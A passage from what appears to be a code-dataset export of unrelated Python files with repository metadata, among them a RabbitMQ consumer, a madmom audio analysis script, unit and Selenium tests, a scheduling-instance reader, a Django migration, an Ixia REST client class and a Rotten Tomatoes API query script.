return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, HandleMethod):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
fdaa80a08a01556a86bb3ba7f86d2de920f0c9ec
|
27b2a3966518ef064e4f645af8addac4e74428a8
|
/Routing/receive_logs_direct.py
|
aad7e66793432419960663b2b30395de7fbe6e9b
|
[] |
no_license
|
Eliza0512/rabbitmq
|
592a04d1759e9c34f4fc0013ee7fa7cedb09c78c
|
86a9f06d178a53b08120e57fc1a7d5e2f69d7e7c
|
refs/heads/master
| 2020-05-17T08:21:33.412447
| 2019-04-26T09:49:39
| 2019-04-26T09:49:39
| 183,603,112
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 886
|
py
|
#!/usr/bin/env python
import pika
import sys
connection = pika.BlockingConnection(
pika.ConnectionParameters(host='localhost'))
channel = connection.channel()
channel.exchange_declare(exchange='direct_logs', exchange_type='direct')
## channel closed queue close
result = channel.queue_declare('', exclusive=True)
queue_name = result.method.queue
severities = sys.argv[1:]
if not severities:
sys.stderr.write("Usage: %s [info] [warning] [error]\n" % sys.argv[0])
sys.exit(1)
for severity in severities:
channel.queue_bind(
exchange='direct_logs', queue=queue_name, routing_key=severity)
print(' [*] Waiting for logs. To exit press CTRL+C')
def callback(ch, method, properties, body):
print(" [x] %r:%r" % (method.routing_key, body))
channel.basic_consume(
queue=queue_name, on_message_callback=callback, auto_ack=True)
channel.start_consuming()
|
[
"wangyongjia@corp-ci.com"
] |
wangyongjia@corp-ci.com
|
1c168dc139da5500467945e5d6b71200e52634b0
|
f27e3a898747d54db1a0c2fa84a72a1ddbf0e785
|
/AudioAnalysisPart/analyse.py
|
dd7b5bd6da0a9d822b8b7558869f9eca8d3aafda
|
[] |
no_license
|
emailandxu/rhythmaticc
|
602aabf94b0c8d360f64004234261606b56ed23d
|
c1edbfe5bf9cc7b70305ca188415424d057060a4
|
refs/heads/master
| 2023-03-21T08:08:31.320700
| 2020-10-27T12:44:11
| 2020-10-27T12:44:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,877
|
py
|
import argparse
import multiprocessing
import os
import time
from madmom.features.beats import RNNBeatProcessor, MultiModelSelectionProcessor, DBNBeatTrackingProcessor
from madmom.features.notes import RNNPianoNoteProcessor, NotePeakPickingProcessor
from madmom.features.onsets import CNNOnsetProcessor, OnsetPeakPickingProcessor
from madmom.features.tempo import TempoEstimationProcessor
from madmom.io.audio import load_ffmpeg_file
from madmom.audio import SignalProcessor
from madmom.processors import SequentialProcessor, ParallelProcessor, IOProcessor
if __name__ == '__main__':
multiprocessing.freeze_support()
parser = argparse.ArgumentParser()
parser.add_argument('filename')
parser.add_argument('-ot', '--othreshold', type=float, default=1.35)
parser.add_argument('-pt', '--pthreshold', type=float, default=0.35)
parser.add_argument('-o', '--onsets-only', action='store_true')
parser.add_argument('-b', '--beats-only', action='store_true')
args = parser.parse_args()
selector = MultiModelSelectionProcessor(None)
rnn_beat_processor = RNNBeatProcessor(post_processor=selector)
fps = 100
pre_max = 1. / fps
post_max = 1. / fps
onset_peak_processor = OnsetPeakPickingProcessor(threshold=args.othreshold, smooth=0.05, fps=fps, pre_max=pre_max,
post_max=post_max)
cnn_processor = CNNOnsetProcessor(fps=fps, pre_max=pre_max, post_max=post_max)
beat_processor = DBNBeatTrackingProcessor(min_bpm=80, max_bpm=210, fps=100)
SignalProcessor.add_arguments(parser, norm=False, gain=0)
note_processor = RNNPianoNoteProcessor()
peak_picking = NotePeakPickingProcessor(threshold=args.pthreshold, smooth=0.05, combine=0.03, fps=fps, pre_max=pre_max, post_max=post_max, delay=0)
seq1 = IOProcessor([cnn_processor, onset_peak_processor])
seq2 = SequentialProcessor([rnn_beat_processor, beat_processor])
seq3 = SequentialProcessor([note_processor, peak_picking])
audiofile, sample_rate = load_ffmpeg_file(args.filename, cmd_decode='./ffmpeg.exe', cmd_probe='./ffprobe.exe', sample_rate=44100)
start_time = time.time()
global onsets_result
onsets_string = ''
beats_string = ''
cpu_count = 1
if os.cpu_count() > 3:
cpu_count = 4
elif os.cpu_count() > 1:
cpu_count = 2
if args.beats_only:
beats_result = seq2.process(audiofile)
beats_string = ','.join(['%.2f' % num for num in beats_result])
beats_string = 'b:' + beats_string
elif args.onsets_only:
parallels_processors = ParallelProcessor([seq1, seq3], cpu_count)
onsets_result = parallels_processors.process(audiofile)
# filter onsets
onsets_string = 'o:'
for onset in onsets_result[0]:
onsets_string += '{:.2f}'.format(onset) + ';'
for note in onsets_result[1]:
if abs(note[0] - onset) < 0.02:
onsets_string += '{:.0f}'.format(note[1]) + '+'
onsets_string += ','
print('c:' + str(len(onsets_result[0])) + '\n')
else:
parallels_processors = ParallelProcessor([seq1, seq2, seq3], cpu_count)
onsets_beats_result = parallels_processors.process(audiofile)
# filter onsets
onsets_string = 'o:'
for onset in onsets_beats_result[0]:
onsets_string += '{:.2f}'.format(onset) + ';'
for note in onsets_beats_result[2]:
if abs(note[0] - onset) < 0.02:
onsets_string += '{:.0f}'.format(note[1]) + '+'
onsets_string += ','
beats_string = ','.join(['%.2f' % num for num in onsets_beats_result[1]])
beats_string = 'b:' + beats_string
output_text = onsets_string + '\n' + beats_string + '\n' + "t:%s" % (time.time() - start_time)
print(output_text, flush=True)
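# Example invocation (the audio file name is an assumption):
#
#   python analyse.py some_song.mp3 --othreshold 1.35 --beats-only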
|
[
"thanik@gmail.com"
] |
thanik@gmail.com
|
653d4cfe9ba35da08cbe76dc1fd34e0b309c6069
|
62c82e9364b4605897c5118df8865047e6dd10e4
|
/python/tests.py
|
08b724e6fb82e60249cd71cbef3b6e1f2a557063
|
[] |
no_license
|
piter0900/programming-challenge
|
e1d32c816cb0f928b39c848977f396a94d06c704
|
fe3829da980dcb9f5b0b5b44206000465ea962fb
|
refs/heads/master
| 2020-03-23T13:37:48.124062
| 2018-07-19T20:39:29
| 2018-07-19T20:39:29
| 141,628,370
| 0
| 0
| null | 2018-07-19T20:36:46
| 2018-07-19T20:36:46
| null |
UTF-8
|
Python
| false
| false
| 1,717
|
py
|
# Write unit tests here
import unittest
from nomnom import how_many_servings
class test_how_many_servings(unittest.TestCase):
def test_no_recepie(self):
recipe={}
inventory={'bread': 20,'peanutButter': 10,'jam': 5}
self.assertEqual(how_many_servings(recipe,inventory), "something is missing")
def test_no_inventory(self):
recipe={'bread': 10,'peanutButter': 5,'jam': 5}
inventory={}
self.assertEqual(how_many_servings(recipe,inventory), "something is missing")
def test_0_in_recipie(self):
recipe={'bread': 10,'peanutButter': 5,'jam': 0}
inventory={'bread': 20,'peanutButter': 10,'jam': 5}
self.assertEqual(how_many_servings(recipe,inventory), 2)
def test_0_in_inventory(self):
recipe={'bread': 10,'peanutButter': 5,'jam': 5}
inventory={'bread': 20,'peanutButter': 10,'jam': 0}
self.assertEqual(how_many_servings(recipe,inventory), 0)
def test_missing_items_in_recipie(self):
recipe={'bread': 10,'peanutButter': 5}
inventory={'bread': 20,'peanutButter': 10,'jam': 5}
self.assertEqual(how_many_servings(recipe,inventory), 2)
def test_missing_items_in_inventory(self):
recipe={'bread': 10,'peanutButter': 5,'jam': 5}
inventory={'bread': 20,'peanutButter': 10}
self.assertEqual(how_many_servings(recipe,inventory), "something is missing")
def test_not_enough_for_1(self):
recipe={'bread': 10,'peanutButter': 5,'jam': 5}
inventory={'bread': 20,'peanutButter': 10,'jam': 4}
self.assertEqual(how_many_servings(recipe,inventory), 0)
def test_1(self):
recipe={'bread': 10,'peanutButter': 5,'jam': 5}
inventory={'bread': 200,'peanutButter': 100,'jam': 50}
self.assertEqual(how_many_servings(recipe,inventory), 10)
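# A minimal reference sketch of the function these tests exercise, derived only
# from the expected values above (the real implementation lives in nomnom.py and
# may differ):
def _sketch_how_many_servings(recipe, inventory):
    if not recipe or not inventory:
        return "something is missing"
    # ingredients with a zero amount in the recipe are not actually needed
    needed = {k: v for k, v in recipe.items() if v > 0}
    if not needed:
        return 0
    if any(k not in inventory for k in needed):
        return "something is missing"
    return min(inventory[k] // needed[k] for k in needed)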
if __name__ == '__main__':
unittest.main()
|
[
"noreply@github.com"
] |
piter0900.noreply@github.com
|
048e7b93b91969e1154c8374e3a18e35e331d941
|
2aca24a9306b864a6c69f80af2500dd6c15bedc0
|
/testproject/classok.py
|
a0bc1a93ce5792cbf206de1b23adad6412bbca34
|
[] |
no_license
|
kincsesl/vizsgaremek_jo
|
cb265c06d15463fd50aa25308a64a8d3a464779b
|
bdd2156d0adf905c4d88fdeb0a5d0590facdbd65
|
refs/heads/main
| 2023-07-05T15:23:54.488144
| 2021-08-05T08:28:18
| 2021-08-05T08:28:18
| 392,580,315
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,002
|
py
|
import time
import lokatorok
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
class TestSign_upLap(object):
def setup(self):
self.options = Options()
#self.options.headless = True
self.driver = webdriver.Chrome(options=self.options)
self.driver.get(lokatorok.signuplap)
self.username = self.driver.find_element_by_xpath(lokatorok.username)
self.emil = self.driver.find_element_by_xpath(lokatorok.emil)
self.password = self.driver.find_element_by_xpath(lokatorok.password)
        self.submit = self.driver.find_element_by_xpath(lokatorok.submit)  # The "Sign up" label.
    def teardown(self):  # Teardown.
pass
#self.driver.close()
def hibaablak(self):
self.felirat = self.driver.find_element_by_xpath(lokatorok.failed)
self.reszlet = self.driver.find_element_by_xpath(lokatorok.reszlet)
self.failed_okgomb = self.driver.find_element_by_xpath(lokatorok.failed_okgomb)
        # self.userhiba = locators.userhiba  # A four-element list.
def sikerablak(self):
self.welcome = self.driver.find_element_by_xpath(lokatorok.welcome)
self.successful = self.driver.find_element_by_xpath(lokatorok.successful)
self.successful_okgomb = self.driver.find_element_by_xpath(lokatorok.successful_okgomb)
def test_01_rossz_mezok(self, a, b, c, d):
if a == "":
self.submit.click()
elif b == "":
self.username.send_keys(a)
self.submit.click()
elif c == "":
self.username.send_keys(a)
self.emil.send_keys(b)
self.submit.click()
else:
self.username.send_keys(a)
self.emil.send_keys(b)
self.password.send_keys(c)
self.submit.click()
time.sleep(1)
self.hibaablak()
log = self.reszlet.text == d
self.failed_okgomb.click()
self.driver.close()
return log
|
[
"kincsesster@gmail.com"
] |
kincsesster@gmail.com
|
d50fec7fa806049d2ec7122534c7a7070982a7eb
|
898e853fdec3d6aceef4a4cec29cf0cb8ad1b987
|
/lists/looping_through_a_list.py
|
bb368c9650f04c8b1ccfbc1bd364ce52ff1c720d
|
[] |
no_license
|
nadiauddin/python-practise
|
85b8b4281f1d14ee8cf5f56232e81feb08b77b06
|
53b10d634297df183aba5e84b4c728da8f3a1761
|
refs/heads/master
| 2022-08-30T09:08:44.605120
| 2020-05-08T16:11:04
| 2020-05-08T16:11:04
| 256,231,016
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 668
|
py
|
# 04/02/2020
# Nadia Uddin
# Looping through a list
# used to carry out the same operation to all elements in a list
months = ['january', 'february', 'march', 'april', 'may', 'june', 'july', 'august', 'september', 'october', 'november', 'december']
print(months[0])
# using a for loop to print a list
# for first element in list
# the for loop will repeat the process until the end - a process of elimination
for month in months:
print(month.title() + "\n")
print("The next month is ")
print("Goodbye!")
# anything more written in the indent even on a new line would be considered in the loop
# so each indented line is executed for each element in the list
|
[
"noreply@github.com"
] |
nadiauddin.noreply@github.com
|
06df2a6c5231371a9158b2c2e65dccda51111807
|
7c9fb1ceb09a47c4eb03d0e07f70137ad5c2de60
|
/615.py
|
a2149e542b3015d951b8048b9865ab5fea9b91f9
|
[] |
no_license
|
SensenLiu123/Lintcode
|
0472838f333bfceabb00b2b1b8cdbf3a4ee386d8
|
11b8ef0f9808ca3d2d08a342bfdba2441840d2f6
|
refs/heads/master
| 2020-05-16T01:36:48.797544
| 2019-09-26T05:02:39
| 2019-09-26T05:02:39
| 182,605,746
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,708
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 27 23:32:30 2019
@author: sensenliu
"""
import collections
class Solution:
"""
@param: numCourses: a total of n courses
@param: prerequisites: a list of prerequisite pairs
@return: true if can finish all courses or false
"""
def canFinish(self, numCourses, prerequisites):
edges, degrees = self.getInDegree(prerequisites, numCourses) ;
starter = []
for course in degrees:
if degrees[course] == 0:
starter.append(course)
if len(starter) == 0:
return False
queue = collections.deque(starter) ;
takeCount = 0 ;
while queue:
node = queue.popleft() ;
takeCount += 1 ;
for following in edges[node]:
degrees[following] -= 1 ;
if degrees[following] == 0 :
queue.append(following) ;
return takeCount == numCourses
def getInDegree(self, prerequisites, N):
courseInDeg = {x: 0 for x in range(N)}
courseUnlock = {x: [] for x in range(N)}
for pair in prerequisites:
later = pair[0]
before = pair[1]
courseInDeg[later] += 1 ;
courseUnlock[before].append(later) ;
return courseUnlock, courseInDeg ;
test = Solution();
N = 4 ;
testIn = [[1,0],[2,1], [3,1]] ;
print(test.canFinish(N,testIn))
|
[
"noreply@github.com"
] |
SensenLiu123.noreply@github.com
|
70481dfca210aaeeac25ae9910116f061fd30640
|
69c16c8c20ad93bbeda827976af9778c1d3e2037
|
/test.py
|
3fc6d033ec62f8a20124c12402645580551d4912
|
[] |
no_license
|
JanMigon/Diffusion-mri
|
53eda28937d372e6b22e8a2788264675e4ff8a6e
|
aea2c5cb2f71508e2d822a28735380a37df5dada
|
refs/heads/master
| 2023-01-05T23:14:34.326676
| 2020-11-05T23:34:33
| 2020-11-05T23:47:27
| 304,928,675
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 161
|
py
|
import utils.utils as ul
if __name__ == '__main__':
my_sphere = ul.create_sphere(30)
print(my_sphere.x)
print(my_sphere.y)
print(my_sphere.z)
|
[
"jan.migon@consonance.tech"
] |
jan.migon@consonance.tech
|
814c6fd7060a1240475c7dece4774f55f274730e
|
0c2cc932b65ff8b966d360647dda85f3e7d037c3
|
/src/analyzer/reader.py
|
f7d25ba590b4720c5a539951d7077be9c2fc3248
|
[] |
no_license
|
Yuhuishishishi/TP3S_generator
|
3c819045ced04a6135400034af23f136e0dd2390
|
7efb88a8741b934372e157809e5ed1fa39e5d43c
|
refs/heads/master
| 2021-01-12T15:17:24.268905
| 2016-10-19T18:39:22
| 2016-10-19T18:39:22
| 71,748,534
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,506
|
py
|
import json
from collections import defaultdict
from json.encoder import JSONEncoder
class TestRequest:
def __init__(self, tid, release, prep, tat, analysis, deadline):
self.tid = tid
self.release = release
self.prep = prep
self.tat = tat
self.analysis = analysis
self.deadline = deadline
@property
def dur(self):
return self.prep + self.tat + self.analysis
    def __repr__(self):
        return "TestRequest(tid=%s, release=%s, dur=%s, deadline=%s)" % (
            self.tid, self.release, self.dur, self.deadline)
def json_repr(self):
o = self
return dict(test_id=int(o.tid), release=int(o.release), deadline=int(o.deadline),
prep=int(o.prep), tat=int(o.tat), analysis=int(o.analysis),
dur=int(o.dur))
class Vehicle:
def __init__(self, vid, release):
self.vid = vid
self.release = release
    def __repr__(self):
        return "Vehicle(vid=%s, release=%s)" % (self.vid, self.release)
def json_repr(self):
o = self
return dict(release=int(o.release), vehicle_id=int(o.vid))
# ========================================== json encoders ==================================
class Instance:
def __init__(self, test_arr, vehicle_arr, rehit_rules):
self.test_arr = test_arr
self.vehicle_arr = vehicle_arr
self.rehit_rules = rehit_rules
@property
def num_test(self):
return len(self.test_arr)
@property
def num_vehicle(self):
return len(self.vehicle_arr)
def json_repr(self):
rehit = defaultdict(dict)
for pair in self.rehit_rules:
first, second = pair
rehit[str(first)][str(second)] = self.rehit_rules[pair]
return dict(tests=self.test_arr, vehicles=self.vehicle_arr, rehit=rehit)
class TP3SInstanceEncoder(JSONEncoder):
def default(self, o):
if hasattr(o, "json_repr"):
return o.json_repr()
return super(TP3SInstanceEncoder, self).default(o)
class TP3SReader:
def __init__(self, path_list):
self.path_list = path_list
self.inst_list = []
def read_instances(self):
for path in self.path_list:
with open(path) as f:
data = f.read()
j = json.loads(data)
inst = _create_instance_from_json(j)
self.inst_list.append(inst)
return self.inst_list
def _create_instance_from_json(j):
test_arr = _parse_tests(j)
vehicle_arr = _parse_vehicles(j)
rehit_rules = _parse_rehit_rules(j)
inst = Instance(test_arr, vehicle_arr, rehit_rules)
return inst
def _parse_vehicles(j):
data = j["vehicles"]
vehicle_arr = [Vehicle(v["vehicle_id"], v["release"]) for v in data]
vehicle_arr.sort(key=lambda x: x.release)
return vehicle_arr
def _parse_tests(j):
test_arr = []
data = j["tests"]
for t in data:
tid = t["test_id"]
prep = t["prep"]
tat = t["tat"]
analysis = t["analysis"]
release = t["release"]
deadline = t["deadline"]
new_test = TestRequest(tid, release, prep, tat, analysis, deadline)
test_arr.append(new_test)
# sorting
test_arr.sort(key=lambda x: x.tid)
return test_arr
def _parse_rehit_rules(j):
data = j["rehit"]
rehit_rules = {}
for k, inner in data.iteritems():
id1 = int(k)
for k2, rule in inner.iteritems():
id2 = int(k2)
rehit_rules[id1, id2] = rule
return rehit_rules
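# Hypothetical round-trip using the reader and encoder above (the instance file
# name is an assumption; any TP3S JSON instance file would do):
if __name__ == '__main__':
    reader = TP3SReader(['example_instance.json'])
    inst = reader.read_instances()[0]
    # json.dumps delegates unknown objects to TP3SInstanceEncoder.default
    print(json.dumps(inst, cls=TP3SInstanceEncoder, indent=2))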
|
[
"yuhuishi@umich.edu"
] |
yuhuishi@umich.edu
|
00ecc7fbb843e969fbfd7a31805b5eea1a3b5d4f
|
7407f652a1384587a3479b37c0f7e76d6b602715
|
/thesis.py
|
04a641dac95f5277b7155a44256bc2bb4547b8cc
|
[
"MIT"
] |
permissive
|
ysmiraak/darc
|
01e6e79547399075cfbbee09f1c0248d87295aa3
|
1a34401d4bba8f98d4bb42801907d002ba2355a6
|
refs/heads/master
| 2021-01-22T18:15:14.677755
| 2018-04-11T19:46:25
| 2018-04-11T19:46:25
| 85,071,770
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,254
|
py
|
# from thesis_atomic import Setup
# from thesis_binary import Setup
# from thesis_onehot import Setup
from thesis_summed import Setup
import conllu  # needed for conllu.load / conllu.save used below
if '__main__' == __name__:
trial = 0
use_form = False
use_lemma = False
embed_const = None
embed_dropout = 0
train_path = "./thesis/train/"
embed_path = "./thesis/embed/"
parse_path = "./thesis/parse/"
def train_parse(lang):
setup = Setup.make(
"{}{}-ud-train.conllu".format(train_path, lang)
, form_w2v="{}{}-form{}.w2v".format(embed_path, lang, 32 if use_lemma else 64) if use_form else None
, lemm_w2v="{}{}-lemm32.w2v".format(embed_path, lang) if use_lemma else None
, binary=True
, proj=False)
model = setup.model(embed_const=embed_const, embed_dropout=embed_dropout)
sents = list(conllu.load("{}{}-ud-dev.conllu".format(train_path, lang)))
for epoch in range(25):
setup.train(model, verbose=2)
conllu.save((setup.parse(model, sent) for sent in sents)
, "{}{}-t{:02d}-e{:02d}.conllu".format(parse_path, lang, trial, epoch))
for lang in 'ar bg eu fa fi_ftb grc he hr it la_proiel nl pl sv tr zh'.split():
train_parse(lang)
|
[
"ysmiraak@gmail.com"
] |
ysmiraak@gmail.com
|
caaec7f00c39cee1f2a533e95c4aab888c2cfb41
|
33a7b06dd3175fd0ecb84d24f735d352d8f7c04a
|
/data_base/migrations/0005_auto_20160513_1733.py
|
19f96a9f261f6827f3b976c09a0102f38ac90abb
|
[] |
no_license
|
ryotayamazaki/function_data_base
|
5b5fddedd249bbbb92acf8152d2c0825921f46d1
|
ac9fa690b31e39d2b161d6004fbeea8071ef12f6
|
refs/heads/master
| 2021-01-01T05:12:33.642822
| 2016-05-19T02:41:17
| 2016-05-19T02:41:17
| 58,899,741
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 579
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-13 08:33
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('data_base', '0004_auto_20160513_1729'),
]
operations = [
migrations.AlterField(
model_name='proglam',
name='link',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='proglam', to='data_base.Pkg', verbose_name='pkg'),
),
]
|
[
"ryota0723@hotmailco.jp"
] |
ryota0723@hotmailco.jp
|
011729a8bb480085313e1073b0ab7d063cae6d85
|
1c6283303ceb883add8de4ee07c5ffcfc2e93fab
|
/Jinja2/lib/python3.7/site-packages/uhd_restpy/testplatform/sessions/ixnetwork/globals/apperrors/error/error.py
|
8a6a225b6b0a0b27a24d8d7e610bec841bc6c21d
|
[] |
no_license
|
pdobrinskiy/devcore
|
0f5b3dfc2f3bf1e44abd716f008a01c443e14f18
|
580c7df6f5db8c118990cf01bc2b986285b9718b
|
refs/heads/main
| 2023-07-29T20:28:49.035475
| 2021-09-14T10:02:16
| 2021-09-14T10:02:16
| 405,919,390
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,992
|
py
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
from typing import List, Any, Union
class Error(Base):
"""This node is a specific application error instance
The Error class encapsulates a list of error resources that are managed by the system.
A list of resources can be retrieved from the server using the Error.find() method.
"""
__slots__ = ()
_SDM_NAME = 'error'
_SDM_ATT_MAP = {
'Description': 'description',
'ErrorCode': 'errorCode',
'ErrorLevel': 'errorLevel',
'InstanceCount': 'instanceCount',
'LastModified': 'lastModified',
'Name': 'name',
'Provider': 'provider',
'SourceColumns': 'sourceColumns',
'SourceColumnsDisplayName': 'sourceColumnsDisplayName',
}
_SDM_ENUM_MAP = {
'errorLevel': ['kAnalysis', 'kCount', 'kError', 'kMessage', 'kWarning'],
}
def __init__(self, parent, list_op=False):
super(Error, self).__init__(parent, list_op)
@property
def Instance(self):
"""
Returns
-------
- obj(uhd_restpy.testplatform.sessions.ixnetwork.globals.apperrors.error.instance.instance.Instance): An instance of the Instance class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from uhd_restpy.testplatform.sessions.ixnetwork.globals.apperrors.error.instance.instance import Instance
if self._properties.get('Instance', None) is not None:
return self._properties.get('Instance')
else:
return Instance(self)
@property
def Description(self):
# type: () -> str
"""
Returns
-------
- str: The description of the error
"""
return self._get_attribute(self._SDM_ATT_MAP['Description'])
@property
def ErrorCode(self):
# type: () -> int
"""
Returns
-------
- number: The error code of the error
"""
return self._get_attribute(self._SDM_ATT_MAP['ErrorCode'])
@property
def ErrorLevel(self):
# type: () -> str
"""
Returns
-------
- str(kAnalysis | kCount | kError | kMessage | kWarning): The error level of the error
"""
return self._get_attribute(self._SDM_ATT_MAP['ErrorLevel'])
@property
def InstanceCount(self):
# type: () -> int
"""
Returns
-------
- number: The number of instances of the error
"""
return self._get_attribute(self._SDM_ATT_MAP['InstanceCount'])
@property
def LastModified(self):
# type: () -> str
"""
Returns
-------
- str:
"""
return self._get_attribute(self._SDM_ATT_MAP['LastModified'])
@property
def Name(self):
# type: () -> str
"""
Returns
-------
- str: The name of the error
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@property
def Provider(self):
# type: () -> str
"""
Returns
-------
- str: The error provider of the error
"""
return self._get_attribute(self._SDM_ATT_MAP['Provider'])
@property
def SourceColumns(self):
# type: () -> List[str]
"""
Returns
-------
- list(str): If the error content originated from an xml meta file, these are the source column names if any for this error.
"""
return self._get_attribute(self._SDM_ATT_MAP['SourceColumns'])
@property
def SourceColumnsDisplayName(self):
# type: () -> List[str]
"""
Returns
-------
- list(str):
"""
return self._get_attribute(self._SDM_ATT_MAP['SourceColumnsDisplayName'])
def add(self):
"""Adds a new error resource on the json, only valid with config assistant
Returns
-------
- self: This instance with all currently retrieved error resources using find and the newly added error resources available through an iterator or index
Raises
------
- Exception: if this function is not being used with config assistance
"""
return self._add_xpath(self._map_locals(self._SDM_ATT_MAP, locals()))
def find(self, Description=None, ErrorCode=None, ErrorLevel=None, InstanceCount=None, LastModified=None, Name=None, Provider=None, SourceColumns=None, SourceColumnsDisplayName=None):
# type: (str, int, str, int, str, str, str, List[str], List[str]) -> Error
"""Finds and retrieves error resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve error resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all error resources from the server.
Args
----
- Description (str): The description of the error
- ErrorCode (number): The error code of the error
- ErrorLevel (str(kAnalysis | kCount | kError | kMessage | kWarning)): The error level of the error
- InstanceCount (number): The number of instances of the error
- LastModified (str):
- Name (str): The name of the error
- Provider (str): The error provider of the error
- SourceColumns (list(str)): If the error content originated from an xml meta file, these are the source column names if any for this error.
- SourceColumnsDisplayName (list(str)):
Returns
-------
- self: This instance with matching error resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of error data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the error resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
|
[
"pdobrinskiy@yahoo.com"
] |
pdobrinskiy@yahoo.com
|
308d40adb060c2029a8b7a9892d344f31366ef2f
|
78c5363fc44bf1f67cdc9fc8d6bbbbdd153c7258
|
/scripts/concat_pandas_tables.py
|
447cf02e36aac6c201d9cc29378a1b865273355e
|
[] |
no_license
|
AlBi-HHU/manchot-gut-microbiome-workflow
|
80cfc1614548729b94e05b861bf20fb3b1b6c6c5
|
e1d569ff3ac058f4f978ed452fc21ceb5d4417d9
|
refs/heads/master
| 2023-08-08T23:18:00.369593
| 2023-07-06T14:22:20
| 2023-07-06T14:22:20
| 514,261,475
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 102
|
py
|
import pandas as pd
pd.concat([pd.read_csv(x) for x in snakemake.input]).to_csv(snakemake.output[0])
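# A hypothetical Snakemake rule that would drive this script (rule, wildcard and
# file names are assumptions, not taken from the actual workflow):
#
#   rule concat_tables:
#       input: expand("tables/{sample}.csv", sample=SAMPLES)
#       output: "tables/all_samples.csv"
#       script: "scripts/concat_pandas_tables.py"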
|
[
"philipp.spohr@hhu.de"
] |
philipp.spohr@hhu.de
|
a9b2d8b50ac2ee4382734c96c0765709c3b27417
|
b7accc88f6f2a8b0bec5c0862f8a73e20ade0f0a
|
/run_rt.py
|
2ac98dbad4bf5a88951ffcbed2a4d5b48b76d6df
|
[] |
no_license
|
jrl-labs/getglue
|
f3fdb656c56ac687528955b19301bee61b0a1646
|
7aadf22e848b43d17020249649feefd7b15850c4
|
refs/heads/master
| 2021-01-11T18:15:34.420068
| 2013-05-24T15:14:21
| 2013-05-24T15:14:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,570
|
py
|
import rt_module
import requests
import yaml
import json
###############################################################################
# Load my API credentials into a dictionary
###############################################################################
with open('conf/auth.yml', 'r') as f:
credentials = yaml.safe_load(f)
key = credentials['rt']['key']
###############################################################################
# Cut and paste from an RT example
###############################################################################
# Three example urls
# The exact same thing from the example, or what you stuck in your web browser
#
#url = 'http://api.rottentomatoes.com/api/public/v1.0/movies.json'
#url = 'http://api.rottentomatoes.com/api/public/v1.0/movies/770672122/reviews.json?apikey=' + key
url = 'http://api.rottentomatoes.com/api/public/v1.0/movies.json?apikey='+key+'&q=terminator&page_limit=1'
# Get back the requests object
r = requests.get(url)
# Extract a dictionary from the json
movies = r.json()  # json is a method in requests >= 1.0 (older releases exposed it as a property)
###############################################################################
# Use the module!
###############################################################################
movies = rt_module.query_moviename('terminator', key)
#
movieid = movies['movies'][0]['id']
#
# # reviews is a list of dictionaries.
# # Each of these will be loaded by R into the row of a table.
reviews = rt_module.movieid_2_reviews(movieid, key)
#
# Dump json to file
with open('reviews.json', 'w') as f:
json.dump(reviews, f)
|
[
"ianlangmore@gmail.com"
] |
ianlangmore@gmail.com
|
7605b0c861febf51a1e02f89589fe89fa4307fce
|
4db51c9d106a2070d8abc2e006d50555db447459
|
/setup.py
|
64bf68a18d61f7a367fb8baa3ac07e5a1e621edf
|
[] |
no_license
|
strange012/tutor_temp
|
e055af060de318b74453bd0c69f60fc69b067bdb
|
